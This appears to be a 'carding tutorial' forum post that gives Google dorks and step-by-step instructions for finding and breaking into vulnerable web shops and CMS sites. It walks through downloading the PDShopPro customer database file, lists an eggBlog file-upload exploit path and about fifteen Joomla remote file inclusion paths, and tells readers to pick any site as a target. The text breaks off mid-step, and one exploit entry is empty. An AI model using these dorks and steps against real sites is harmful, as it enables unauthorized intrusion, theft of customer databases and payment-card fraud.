Carding Tutorial - PDShopPro Shopping Cart

Dork:

allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is 

 www.example.com/shop/category.asp?catid=2

4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see some thing like this.

 

5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb

Exploit eggBlog 414 Arbitrary File Upload

Dork:

"powered by eggBlog.net"

Exploit : 

/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Remote File Inclusion [RFI] Dorks

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=

Exploit Wordpress : fbconnect SQL Injection Vulnerability

Dork:

inurl:"fbconnect_action=myhome"

Exploit: 

Shop737 - File Upload Vulnerabilities

Finding Vulnerable Target

Dork:

intext:"Powered by Shop737"

1- Copy and paste this dork on Google.

2- Choose any site as your target.

3- Once you clicked on your target, you will see something like this,